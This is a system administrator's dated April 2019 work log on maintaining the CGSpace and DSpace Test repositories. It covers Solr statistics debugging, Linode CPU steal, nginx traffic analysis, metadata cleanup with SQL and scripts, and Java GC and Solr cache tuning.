+                "statistics_type:view",
+                "bundleName:ORIGINAL",
+                "dateYearMonth:2019-04"
+            ],
+            "indent": "true",
+            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
+            "rows": "0",
+            "wt": "json"
+        },
+        "status": 0
+    }
+}
+
+
$ http --print Hh GET https://dspacetest.cgiar.org/bitstream/handle/10568/100289/Spore-192-EN-web.pdf
+GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: dspacetest.cgiar.org
+User-Agent: HTTPie/1.0.2
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Language: en-US
+Content-Length: 2069158
+Content-Type: application/pdf;charset=ISO-8859-1
+Date: Sun, 07 Apr 2019 08:38:34 GMT
+Expires: Sun, 07 Apr 2019 09:38:34 GMT
+Last-Modified: Thu, 14 Mar 2019 11:20:05 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=21A492CC31CA8845278DFA078BD2D9ED; Path=/; Secure; HttpOnly
+Vary: User-Agent
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-Robots-Tag: none
+X-XSS-Protection: 1; mode=block
+
+$ http --print Hh HEAD https://dspacetest.cgiar.org/bitstream/handle/10568/100289/Spore-192-EN-web.pdf      
+HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1                                                            
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: dspacetest.cgiar.org
+User-Agent: HTTPie/1.0.2
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Language: en-US
+Content-Length: 2069158
+Content-Type: application/pdf;charset=ISO-8859-1
+Date: Sun, 07 Apr 2019 08:39:01 GMT
+Expires: Sun, 07 Apr 2019 09:39:01 GMT
+Last-Modified: Thu, 14 Mar 2019 11:20:05 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=36C8502257CC6C72FD3BC9EBF91C4A0E; Path=/; Secure; HttpOnly                                            
+Vary: User-Agent
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-Robots-Tag: none
+X-XSS-Protection: 1; mode=block
+
    +
  • And from the server side, the nginx logs show:
  • +
+
78.x.x.x - - [07/Apr/2019:01:38:35 -0700] "GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 68078 "-" "HTTPie/1.0.2"
+78.x.x.x - - [07/Apr/2019:01:39:01 -0700] "HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 0 "-" "HTTPie/1.0.2"
+
    +
  • So definitely the size of the transfer is more efficient with a HEAD, but I need to wait to see if these requests show up in Solr +
      +
    • After twenty minutes of waiting I still don’t see any new requests in the statistics core, but when I try the requests from the command line again I see the following in the DSpace log:
    • +
    +
  • +
+
2019-04-07 02:05:30,966 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=EF2DB6E4F69926C5555B3492BB0071A8:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
+2019-04-07 02:05:39,265 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=B6381FC590A5160D84930102D068C7A3:ip_addr=78.x.x.x:view_bitstream:bitstream_id=165818
+
    +
  • So my inclination is that both HEAD and GET requests are registered as views as far as Solr and DSpace are concerned +
      +
    • Strangely, the statistics Solr core says it hasn’t been modified in 24 hours, so I tried to start the “optimize” process from the Admin UI and I see this in the Solr log:
    • +
    +
  • +
+
2019-04-07 02:08:44,186 INFO  org.apache.solr.update.UpdateHandler @ start commit{,optimize=true,openSearcher=true,waitSearcher=true,expungeDeletes=false,softCommit=false,prepareCommit=false}
+
    +
  • Ugh, even after optimizing there are no Solr results for requests from my IP, and actually I only see 18 results from 2019-04 so far and none of them are statistics_type:view… very weird +
      +
    • I don’t even see many hits for days after 2019-03-17, when I migrated the server to Ubuntu 18.04 and copied the statistics core from CGSpace (linode18)
    • +
    • I will try to re-deploy the 5_x-dev branch and test again
    • +
    +
  • +
  • According to the DSpace 5.x Solr documentation the default commit time is after 15 minutes or 10,000 documents (see solrconfig.xml)
  • +
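That setting looks roughly like this in the statistics core’s solrconfig.xml (the values are the documented defaults, not something I changed):

<!-- inside <updateHandler>: commit after 10,000 docs or 15 minutes, whichever comes first -->
<autoCommit>
  <maxDocs>10000</maxDocs>
  <maxTime>900000</maxTime>
</autoCommit>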
  • I looped some GET and HEAD requests to a bitstream on my local instance and after some time I see that they do register as downloads (even though they are internal):
  • +
+
$ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&fq=statistics_type%3Aview&fq=isInternal%3Atrue&rows=0&wt=json&indent=true'
+{
+    "response": {
+        "docs": [],
+        "numFound": 909,
+        "start": 0
+    },
+    "responseHeader": {
+        "QTime": 0,
+        "params": {
+            "fq": [
+                "statistics_type:view",
+                "isInternal:true"
+            ],
+            "indent": "true",
+            "q": "type:0 AND time:2019-04-07*",
+            "rows": "0",
+            "wt": "json"
+        },
+        "status": 0
+    }
+}
+
    +
  • I confirmed the same on CGSpace itself after making one HEAD request
  • +
  • So I’m pretty sure it’s something about DSpace Test using the CGSpace statistics core, and not that I deployed Solr 4.10.4 there last week +
      +
    • I deployed Solr 4.10.4 locally and ran a bunch of requests for bitstreams and they do show up in the Solr statistics log, so the issue must be with re-using the existing Solr core from CGSpace
    • +
    +
  • +
  • Now this gets more frustrating: I did the same GET and HEAD tests on a local Ubuntu 16.04 VM with Solr 4.10.2 and 4.10.4 and the statistics are recorded +
      +
    • This leads me to believe there is something specifically wrong with DSpace Test (linode19)
    • +
    • The only thing I can think of is that the JVM is using G1GC instead of ConcMarkSweepGC
    • +
    +
  • +
  • Holy shit, all this is actually because of the GeoIP1 deprecation and a missing GeoLiteCity.dat +
      +
    • For some reason the missing GeoIP data causes stats to not be recorded whatsoever and there is no error!
    • +
    • See: DS-3986
    • +
    • See: DS-4020
    • +
    • See: DS-3832
    • +
    • DSpace 5.10 upgraded to use GeoIP2, but we are on 5.8 so I just copied the missing database file from another server because it has been removed from MaxMind’s server as of 2018-04-01
    • +
    • Now I made 100 requests and I see them in the Solr statistics… fuck my life for wasting five hours debugging this
    • +
    +
  • +
  • UptimeRobot said CGSpace went down and up a few times tonight, and my first instinct was to check iostat 1 10 and I saw that CPU steal is around 10–30 percent right now…
  • +
  • The load average is super high right now, as I’ve noticed the last few times UptimeRobot said that CGSpace went down:
  • +
+
$ cat /proc/loadavg 
+10.70 9.17 8.85 18/633 4198
+
    +
  • According to the server logs there is actually not much going on right now:
  • +
+
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    118 18.195.78.144
+    128 207.46.13.219
+    129 167.114.64.100
+    159 207.46.13.129
+    179 207.46.13.33
+    188 2408:8214:7a00:868f:7c1e:e0f3:20c6:c142
+    195 66.249.79.59
+    363 40.77.167.21
+    740 2a01:4f8:140:3192::2
+   4823 45.5.184.72
+# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      3 66.249.79.62
+      3 66.249.83.196
+      4 207.46.13.86
+      5 82.145.222.150
+      6 2a01:4f9:2b:1263::2
+      6 41.204.190.40
+      7 35.174.176.49
+     10 40.77.167.21
+     11 194.246.119.6
+     11 66.249.79.59
+
    +
  • 45.5.184.72 is CIAT, who I already blocked and am waiting to hear from
  • +
  • 2a01:4f8:140:3192::2 is BLEXbot, which should be handled by the Tomcat Crawler Session Manager Valve
  • +
  • 2408:8214:7a00:868f:7c1e:e0f3:20c6:c142 is some stupid Chinese bot making malicious POST requests
  • +
  • There are free database connections in the pool:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+      7 dspaceCli
+     23 dspaceWeb
+
    +
  • It seems that the issue with CGSpace being “down” is actually because of CPU steal again!!!
  • +
  • I opened a ticket with support and asked them to migrate the VM to a less busy host
  • +
+

2019-04-08

+
    +
  • Start checking IITA’s last round of batch uploads from March on DSpace Test (20193rd.xls) +
      +
    • Lots of problems with affiliations, I had to correct about sixty of them
    • +
    • I used lein to host the latest CSV of our affiliations for OpenRefine to reconcile against:
    • +
    +
  • +
+
$ lein run ~/src/git/DSpace/2019-02-22-affiliations.csv name id
+
    +
  • After matching the values and creating some new matches I had trouble remembering how to copy the reconciled values to a new column +
      +
    • The matched values can be accessed with cell.recon.match.name, but some of the new values don’t appear, perhaps because I edited the original cell values?
    • +
    • I ended up using this GREL expression to copy all values to a new column:
    • +
    +
  • +
+
if(cell.recon.matched, cell.recon.match.name, value)
+
    +
  • See the OpenRefine variables documentation for more notes about the recon object
  • +
  • I also noticed a handful of errors in our current list of affiliations so I corrected them:
  • +
+
$ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
+
    +
  • We should create a new list of affiliations to update our controlled vocabulary again
  • +
  • I dumped a list of the top 1500 affiliations:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 211 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-04-08-top-1500-affiliations.csv WITH CSV HEADER;
+COPY 1500
+
    +
  • Fix a few more messed up affiliations that have return characters in them (use Ctrl-V Ctrl-M to re-create control character):
  • +
+
dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
+dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural  and Livestock  Research^M%';
+
    +
  • I noticed a bunch of subjects and affiliations that use stylized apostrophes so I will export those and then batch update them:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%’%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
+COPY 60
+dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%’%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
+COPY 20
+
    +
  • I cleaned them up in OpenRefine and then applied the fixes on CGSpace and DSpace Test:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
+$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
+
    +
  • UptimeRobot said that CGSpace (linode18) went down tonight +
      +
    • The load average is at 9.42, 8.87, 7.87
    • +
    • I looked at PostgreSQL and see shitloads of connections there:
    • +
    +
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+      7 dspaceCli
+    250 dspaceWeb
+
    +
  • On a related note I see connection pool errors in the DSpace log:
  • +
+
2019-04-08 19:01:10,472 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - 
+org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-319] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
+
    +
  • But still I see 10 to 30% CPU steal in iostat that is also reflected in the Munin graphs:
  • +
+

CPU usage week

+
    +
  • Linode Support still didn’t respond to my ticket from yesterday, so I attached a new output of iostat 1 10 and asked them to move the VM to a less busy host
  • +
  • The web server logs are not very busy:
  • +
+
# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    124 40.77.167.135
+    135 95.108.181.88
+    139 157.55.39.206
+    190 66.249.79.133
+    202 45.5.186.2
+    284 207.46.13.95
+    359 18.196.196.108
+    457 157.55.39.164
+    457 40.77.167.132
+   3822 45.5.184.72
+# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      5 129.0.79.206
+      5 41.205.240.21
+      7 207.46.13.95
+      7 66.249.79.133
+      7 66.249.79.135
+      7 95.108.181.88
+      8 40.77.167.111
+     19 157.55.39.164
+     20 40.77.167.132
+    370 51.254.16.223
+

2019-04-09

+
    +
  • Linode sent an alert that CGSpace (linode18) was 440% CPU for the last two hours this morning
  • +
  • Here are the top IPs in the web server logs around that time:
  • +
+
# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     18 66.249.79.139
+     21 157.55.39.160
+     29 66.249.79.137
+     38 66.249.79.135
+     50 34.200.212.137
+     54 66.249.79.133
+    100 102.128.190.18
+   1166 45.5.184.72
+   4251 45.5.186.2
+   4895 205.186.128.185
+# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    200 144.48.242.108
+    202 207.46.13.185
+    206 18.194.46.84
+    239 66.249.79.139
+    246 18.196.196.108
+    274 31.6.77.23
+    289 66.249.79.137
+    312 157.55.39.160
+    441 66.249.79.135
+    856 66.249.79.133
+
    +
  • 45.5.186.2 is at CIAT in Colombia and I see they are mostly making requests to the REST API, but also to XMLUI with the following user agent:
  • +
+
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
+
    +
  • Database connection usage looks fine:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+      7 dspaceCli
+     11 dspaceWeb
+
    +
  • Ironically I do still see some 2 to 10% of CPU steal in iostat 1 10
  • +
  • Leroy from CIAT contacted me to say he knows the team who is making all those requests to CGSpace +
      +
    • I told them how to use the REST API to get the CIAT Datasets collection and enumerate its items
    • +
    +
  • +
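For reference, enumerating a collection over the REST API is roughly: resolve the Handle to get the internal ID, then page through the items with limit and offset; a sketch (the collection ID is a placeholder):

$ http 'https://cgspace.cgiar.org/rest/handle/10568/72970'
$ http 'https://cgspace.cgiar.org/rest/collections/COLLECTION_ID/items?limit=100&offset=0'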
  • In other news, Linode staff identified a noisy neighbor sharing our host and migrated it elsewhere last night
  • +
+

2019-04-10

+
    +
  • Abenet pointed out a possibility of validating funders against the CrossRef API
  • +
  • Note that if you use HTTPS and specify a contact address in the API request you have less likelihood of being blocked
  • +
+
$ http 'https://api.crossref.org/funders?query=mercator&mailto=me@cgiar.org'
+
    +
  • Otherwise, they provide the funder data in CSV and RDF format
  • +
  • I did a quick test with the recent IITA records against reconcile-csv in OpenRefine and it matched a few, but the ones that didn’t match will need a human to go and do some manual checking and informed decision making…
  • +
  • If I want to write a script for this I could use the Python habanero library:
  • +
+
from habanero import Crossref
+cr = Crossref(mailto="me@cgiar.org")
+x = cr.funders(query = "mercator")
+

2019-04-11

+
    +
  • Continue proofing IITA’s last round of batch uploads from March on DSpace Test (20193rd.xls) +
      +
    • One misspelled country
    • +
    • Three incorrect regions
    • +
    • Potential duplicates (same DOI, similar title, same authors):
    • +
    • Two DOIs with incorrect URL formatting
    • +
    • Two misspelled IITA subjects
    • +
    • Two authors with smart quotes
    • +
    • Lots of issues with sponsors
    • +
    • One misspelled “Peer review”
    • +
    • One invalid ISBN that I fixed by Googling the title
    • +
    • Lots of issues with sponsors (German Aid Agency, Swiss Aid Agency, Italian Aid Agency, Dutch Aid Agency, etc)
    • +
    • I validated all the AGROVOC subjects against our latest list with reconcile-csv +
        +
      • About 720 of the 900 terms were matched, then I checked and fixed or deleted the rest manually
      • +
      +
    • +
    +
  • +
  • I captured a few general corrections and deletions for AGROVOC subjects while looking at IITA’s records, so I applied them to DSpace Test and CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
+$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
+
    +
  • Answer more questions about DOIs and Altmetric scores from WLE
  • +
  • Answer more questions about DOIs and Altmetric scores from IWMI +
      +
    • They can’t seem to understand the Altmetric + Twitter flow for associating Handles and DOIs
    • +
    • To make things worse, many of their items DON’T have DOIs, so when Altmetric harvests them of course there is no link! Then, a bunch of their items don’t have scores because they never tweeted them!
    • +
    • They added a DOI to this old item 10567/97087 this morning and wonder why Altmetric’s score hasn’t linked with the DOI magically
    • +
    • We should check in a week to see if Altmetric will make the association after one week when they harvest again
    • +
    +
  • +
+

2019-04-13

+
    +
  • I copied the statistics and statistics-2018 Solr cores from CGSpace to my local machine and watched the Java process in VisualVM while indexing item views and downloads with my dspace-statistics-api:
  • +
+

Java GC during Solr indexing with CMS

+
    +
  • It took about eight minutes to index 784 pages of item views and 268 of downloads, and you can see a clear “sawtooth” pattern in the garbage collection
  • +
  • I am curious if the GC pattern would be different if I switched from -XX:+UseConcMarkSweepGC to G1GC (an example of typical G1 flags is at the end of this day’s notes)
  • +
  • I switched to G1GC and restarted Tomcat but for some reason I couldn’t see the Tomcat PID in VisualVM… +
      +
    • Anyways, the indexing process took much longer, perhaps twice as long!
    • +
    +
  • +
  • I tried again with the GC tuning settings from the Solr 4.10.4 release:
  • +
+

Java GC during Solr indexing Solr 4.10.4 settings

+
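  • For reference, a G1GC-based GC_TUNE would look something like the following; these particular values are just an illustration and not something I have benchmarked:

GC_TUNE="-XX:+UseG1GC \
    -XX:+ParallelRefProcEnabled \
    -XX:G1HeapRegionSize=8m \
    -XX:MaxGCPauseMillis=250"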

2019-04-14

+
    +
  • Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:
  • +
+
GC_TUNE="-XX:NewRatio=3 \
+    -XX:SurvivorRatio=4 \
+    -XX:TargetSurvivorRatio=90 \
+    -XX:MaxTenuringThreshold=8 \
+    -XX:+UseConcMarkSweepGC \
+    -XX:+UseParNewGC \
+    -XX:ConcGCThreads=4 -XX:ParallelGCThreads=4 \
+    -XX:+CMSScavengeBeforeRemark \
+    -XX:PretenureSizeThreshold=64m \
+    -XX:+UseCMSInitiatingOccupancyOnly \
+    -XX:CMSInitiatingOccupancyFraction=50 \
+    -XX:CMSMaxAbortablePrecleanTime=6000 \
+    -XX:+CMSParallelRemarkEnabled \
+    -XX:+ParallelRefProcEnabled"
+
    +
  • I need to remember to check the Munin JVM graphs in a few days
  • +
  • It might be placebo, but the site does feel snappier…
  • +
+

2019-04-15

+
    +
  • Rework the dspace-statistics-api to use the vanilla Python requests library instead of a Solr client library (a rough sketch of such a query is at the end of this day’s notes) + +
  • +
  • Pretty annoying to see CGSpace (linode18) with 20–50% CPU steal according to iostat 1 10, though I haven’t had any Linode alerts in a few days
  • +
  • Abenet sent me a list of ILRI items that don’t have CRPs added to them +
      +
    • The spreadsheet only had Handles (no IDs), so I’m experimenting with using Python in OpenRefine to get the IDs
    • +
    • I cloned the handle column and then did a transform to get the IDs from the CGSpace REST API:
    • +
    +
  • +
+
import json
+import re
+import urllib2
+
+# This runs as a Jython expression in OpenRefine, so "value" is the current
+# cell (the item's Handle URI) and the return value becomes the new cell
+handle = re.findall('[0-9]+/[0-9]+', value)
+
+# Look the Handle up in the CGSpace REST API to get the item's database ID
+url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0]
+req = urllib2.Request(url)
+req.add_header('User-agent', 'Alan Python bot')
+res = urllib2.urlopen(req)
+data = json.load(res)
+item_id = data['id']
+
+return item_id
+
    +
  • Luckily none of the items already had CRPs, so I didn’t have to worry about them getting removed +
      +
    • It would have been much trickier if I had to get the CRPs for the items first, then add the CRPs…
    • +
    +
  • +
  • I ran a full Discovery indexing on CGSpace because I didn’t do it after all the metadata updates last week:
  • +
+
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    82m45.324s
+user    7m33.446s
+sys     2m13.463s
+
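  • Regarding the dspace-statistics-api rework above, querying Solr with the requests library is trivial; a rough sketch (the core URL and filters are assumptions for illustration):

import requests

# Count item view events (type:2 is an item in DSpace's Solr statistics schema)
res = requests.get(
    'http://localhost:8081/solr/statistics/select',
    params={'q': 'type:2', 'fq': '-isBot:true', 'rows': 0, 'wt': 'json'},
)
print(res.json()['response']['numFound'])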

2019-04-16

+
    +
  • Export IITA’s community from CGSpace because they want to experiment with importing it into their internal DSpace for some testing or something
  • +
+
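  • One way to do that is an AIP export of the whole community, roughly like this (the Handle is a placeholder):

$ dspace packager -d -a -t AIP -e me@cgiar.org -i 10568/1234 /tmp/iita-community.zip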

2019-04-17

+
    +
  • Reading an interesting blog post about Solr caching
  • +
  • Did some tests of the dspace-statistics-api on my local DSpace instance with 28 million documents in a sharded statistics core (statistics and statistics-2018) and monitored the memory usage of Tomcat in VisualVM
  • +
  • 4GB heap, CMS GC, 512 filter cache, 512 query cache, with 28 million documents in two shards +
      +
    • Run 1: +
        +
      • Time: 3.11s user 0.44s system 0% cpu 13:45.07 total
      • +
      • Tomcat (not Solr) max JVM heap usage: 2.04 GiB
      • +
      +
    • +
    • Run 2: +
        +
      • Time: 3.23s user 0.43s system 0% cpu 13:46.10 total
      • +
      • Tomcat (not Solr) max JVM heap usage: 2.06 GiB
      • +
      +
    • +
    • Run 3: +
        +
      • Time: 3.23s user 0.42s system 0% cpu 13:14.70 total
      • +
      • Tomcat (not Solr) max JVM heap usage: 2.13 GiB
      • +
      • filterCache size: 482, cumulative_lookups: 7062712, cumulative_hits: 167903, cumulative_hitratio: 0.02
      • +
      • queryResultCache size: 2
      • +
      +
    • +
    +
  • +
  • 4GB heap, CMS GC, 1024 filter cache, 512 query cache, with 28 million documents in two shards +
      +
    • Run 1: +
        +
      • Time: 2.92s user 0.39s system 0% cpu 12:33.08 total
      • +
      • Tomcat (not Solr) max JVM heap usage: 2.16 GiB
      • +
      +
    • +
    • Run 2: +
        +
      • Time: 3.10s user 0.39s system 0% cpu 12:25.32 total
      • +
      • Tomcat (not Solr) max JVM heap usage: 2.07 GiB
      • +
      +
    • +
    • Run 3: +
        +
      • Time: 3.29s user 0.36s system 0% cpu 11:53.47 total
      • +
      • Tomcat (not Solr) max JVM heap usage: 2.08 GiB
      • +
      • filterCache size: 951, cumulative_lookups: 7062712, cumulative_hits: 254379, cumulative_hitratio: 0.04
      • +
      +
    • +
    +
  • +
  • 4GB heap, CMS GC, 2048 filter cache, 512 query cache, with 28 million documents in two shards +
      +
    • Run 1: +
        +
      • Time: 2.90s user 0.48s system 0% cpu 10:37.31 total
      • +
      • Tomcat max JVM heap usage: 1.96 GiB
      • +
      • filterCache size: 1901, cumulative_lookups: 2354237, cumulative_hits: 180111, cumulative_hitratio: 0.08
      • +
      +
    • +
    • Run 2: +
        +
      • Time: 2.97s user 0.39s system 0% cpu 10:40.06 total
      • +
      • Tomcat max JVM heap usage: 2.09 GiB
      • +
      • filterCache size: 1901, cumulative_lookups: 4708473, cumulative_hits: 360068, cumulative_hitratio: 0.08
      • +
      +
    • +
    • Run 3: +
        +
      • Time: 3.28s user 0.37s system 0% cpu 10:49.56 total
      • +
      • Tomcat max JVM heap usage: 2.05 GiB
      • +
      • filterCache size: 1901, cumulative_lookups: 7062712, cumulative_hits: 540020, cumulative_hitratio: 0.08
      • +
      +
    • +
    +
  • +
  • 4GB heap, CMS GC, 4096 filter cache, 512 query cache, with 28 million documents in two shards +
      +
    • Run 1: +
        +
      • Time: 2.88s user 0.35s system 0% cpu 8:29.55 total
      • +
      • Tomcat max JVM heap usage: 2.15 GiB
      • +
      • filterCache size: 3770, cumulative_lookups: 2354237, cumulative_hits: 414512, cumulative_hitratio: 0.18
      • +
      +
    • +
    • Run 2: +
        +
      • Time: 3.01s user 0.38s system 0% cpu 9:15.65 total
      • +
      • Tomcat max JVM heap usage: 2.17 GiB
      • +
      • filterCache size: 3945, cumulative_lookups: 4708473, cumulative_hits: 829093, cumulative_hitratio: 0.18
      • +
      +
    • +
    • Run 3: +
        +
      • Time: 3.01s user 0.40s system 0% cpu 9:01.31 total
      • +
      • Tomcat max JVM heap usage: 2.07 GiB
      • +
      • filterCache size: 3770, cumulative_lookups: 7062712, cumulative_hits: 1243632, cumulative_hitratio: 0.18
      • +
      +
    • +
    +
  • +
  • The biggest takeaway I have is that this workload benefits from a larger filterCache (for Solr fq parameter), but barely uses the queryResultCache (for Solr q parameter) at all +
      +
    • The number of hits goes up and the time taken decreases when we increase the filterCache, and total JVM heap memory doesn’t seem to increase much at all
    • +
    • I guess the queryResultCache size is always 2 because I’m only doing two queries: type:0 and type:2 (downloads and views, respectively)
    • +
    +
  • +
  • Here is the general pattern of running three sequential indexing runs as seen in VisualVM while monitoring the Tomcat process:
  • +
+

VisualVM Tomcat 4096 filterCache

+
    +
  • I ran one test with a filterCache of 16384 to try to see if I could make the Tomcat JVM memory balloon, but actually it drastically increased the performance and memory usage of the dspace-statistics-api indexer
  • +
  • 4GB heap, CMS GC, 16384 filter cache, 512 query cache, with 28 million documents in two shards +
      +
    • Run 1: +
        +
      • Time: 2.85s user 0.42s system 2% cpu 2:28.92 total
      • +
      • Tomcat max JVM heap usage: 1.90 GiB
      • +
      • filterCache size: 14851, cumulative_lookups: 2354237, cumulative_hits: 2331186, cumulative_hitratio: 0.99
      • +
      +
    • +
    • Run 2: +
        +
      • Time: 2.90s user 0.37s system 2% cpu 2:23.50 total
      • +
      • Tomcat max JVM heap usage: 1.27 GiB
      • +
      • filterCache size: 15834, cumulative_lookups: 4708476, cumulative_hits: 4664762, cumulative_hitratio: 0.99
      • +
      +
    • +
    • Run 3: +
        +
      • Time: 2.93s user 0.39s system 2% cpu 2:26.17 total
      • +
      • Tomcat max JVM heap usage: 1.05 GiB
      • +
      • filterCache size: 15248, cumulative_lookups: 7062715, cumulative_hits: 6998267, cumulative_hitratio: 0.99
      • +
      +
    • +
    +
  • +
  • The JVM garbage collection graph is MUCH flatter, and memory usage is much lower (not to mention a drop in GC-related CPU usage)!
  • +
+

VisualVM Tomcat 16384 filterCache
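  • For reference, this is the kind of change in the statistics core’s solrconfig.xml (a sketch; the class and other attributes are whatever the stock config already uses):

<filterCache class="solr.FastLRUCache"
             size="16384"
             initialSize="512"
             autowarmCount="0"/>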

+
    +
  • I will deploy this filterCache setting on DSpace Test (linode19)
  • +
  • Run all system updates on DSpace Test (linode19) and reboot it
  • +
  • Lots of CPU steal going on still on CGSpace (linode18):
  • +
+

CPU usage week

+

2019-04-18

+
    +
  • I’ve been trying to copy the statistics-2018 Solr core from CGSpace to DSpace Test since yesterday, but the network speed is like 20KiB/sec +
      +
    • I opened a support ticket to ask Linode to investigate
    • +
    • They asked me to send an mtr report from Fremont to Frankfurt and vice versa
    • +
    +
  • +
  • Deploy Tomcat 7.0.94 on DSpace Test (linode19) +
      +
    • Also, I realized that the CMS GC changes I deployed a few days ago were ignored by Tomcat because of something with how Ansible formatted the options string
    • +
    • I needed to use the “folded” YAML variable format >- (with the dash so it doesn’t add a return at the end; a small example is at the end of this day’s notes)
    • +
    +
  • +
  • UptimeRobot says that CGSpace went “down” this afternoon, but I looked at the CPU steal with iostat 1 10 and it’s in the 50s and 60s +
      +
    • The munin graph shows a lot of CPU steal (red) currently (and over all during the week):
    • +
    +
  • +
+

CPU usage week

+
    +
  • I opened a ticket with Linode to migrate us somewhere +
      +
    • They agreed to migrate us to a quieter host
    • +
    +
  • +
+
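  • For reference, the folded-and-strip YAML format I mean looks like this (the variable name here is just an example, not the real one from the Ansible role):

tomcat_java_opts: >-
  -Xms3g -Xmx3g
  -XX:+UseConcMarkSweepGC
  -XX:+CMSScavengeBeforeRemark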

2019-04-20

+
    +
  • Linode agreed to move CGSpace (linode18) to a new machine shortly after I filed my ticket about CPU steal two days ago and now the load is much more sane:
  • +
+

CPU usage week

+
    +
  • For future reference, Linode mentioned that they consider CPU steal above 8% to be significant
  • +
  • Regarding the other Linode issue about speed, I did a test with iperf between linode18 and linode19:
  • +
+
# iperf -s
+------------------------------------------------------------
+Server listening on TCP port 5001
+TCP window size: 85.3 KByte (default)
+------------------------------------------------------------
+[  4] local 45.79.x.x port 5001 connected with 139.162.x.x port 51378
+------------------------------------------------------------
+Client connecting to 139.162.x.x, TCP port 5001
+TCP window size: 85.0 KByte (default)
+------------------------------------------------------------
+[  5] local 45.79.x.x port 36440 connected with 139.162.x.x port 5001
+[ ID] Interval       Transfer     Bandwidth
+[  5]  0.0-10.2 sec   172 MBytes   142 Mbits/sec
+[  4]  0.0-10.5 sec   202 MBytes   162 Mbits/sec
+
    +
  • Even with the software firewalls disabled the rsync speed was low, so it’s not a rate limiting issue
  • +
